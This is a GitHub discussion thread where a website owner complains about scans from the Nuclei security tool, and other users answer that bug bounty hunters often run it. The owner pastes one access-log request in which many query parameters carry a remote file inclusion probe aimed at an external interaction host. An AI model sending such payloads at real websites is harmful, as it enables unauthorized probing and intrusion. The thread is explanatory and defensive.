Question about traffic generated by Nuclei project #771
-
|
Hi once again! I don't know whether I was clear the last time I reported the mentioned issue, but it keeps persisting. Once again, the code for hacking my website is being used directly from your Github repository: GET /?cat=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&dir=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&action=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&board=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&date=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&detail=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&file=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&download=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&path=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&folder=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&prefix=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&include=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&page=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&inc=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&locate=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&show=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&doc=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&site=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&type=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&view=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&content=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&document=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&layout=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&mod=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&conf=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt&filename=%5c%5cwinrfi.auraelegance.com.01h4x.com%5ca%5ca.txt HTTP/1.1" 301 162 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei) Hopefully a proper answer to my reporting! |
Beta Was this translation helpful? Give feedback.
Replies: 3 comments 4 replies
-
|
Hi, I don't think there is anything you can do about this, other than sending an abuse report to the owner of that IP (if the malicious server is on DigitalOcean send a report to [email protected]). If your server is on the cloud, I suggest you to change the IP, sometimes Bug bounty programs have assets on the cloud, they delete those assets, but keep their DNS A records pointing to them, so anyone participating in that program launching Nuclei will be unknowingly sending requests to an IP no longer owned by the Bug Bounty Program, if it is you that got the IP the Bug bounty program was using then you are screwed up, you are gonna get bombarded by nuclei scans from people thinking they are scanning the Bug Bounty Program when they are actually targeting you ... |
Beta Was this translation helpful? Give feedback.
-
|
Ok, Melardev, thanks a lot for this info, have a great time ahead! |
Beta Was this translation helpful? Give feedback.
-
|
Thank you @melardev for sharing the response to this, we will adding this to the Github Wiki page as well as others might have similar question as well. |
Beta Was this translation helpful? Give feedback.
-
|
You do realize this is an open source publicly available tool right and that the creators are NOT responsible for what happens to your website. File an abuse report with the holder of the IP attacking you instead of looking like a pleb on here. |
Beta Was this translation helpful? Give feedback.
-
|
that's right, not necessarily everyone is aware of how things work in all aspects, so sharing the right information will be useful for everyone. |
Beta Was this translation helpful? Give feedback.
-
|
Took a sharper approach since they ignored everyone trying to explain it to them before. Thanks for the contributions Bauthard! |
Beta Was this translation helpful? Give feedback.
-
|
And to clear up further harassments in the future please remove your website url before posting, otherwise you might be getting more unwanted attention especially when you come here bearing a "sword". |
Beta Was this translation helpful? Give feedback.
Hi, I don't think there is anything you can do about this, other than sending an abuse report to the owner of that IP (if the malicious server is on DigitalOcean send a report to [email protected]).
This tool is heavily used by Bug bounty hunters nowadays, I had myself access to some HTTP logs (through subdomain takeover, LFI, or RCE) and it is scary, most requests come from Nuclei, for subdomain takeovers I have seen nuclei scans literally 2 minutes after taking over a subdomain that can give you an idea of how frequent these scans are.
The disease of blindly misusing nuclei is a well-known problem in Bug bounty and it is not gonna go away, more and more people are joining this tren…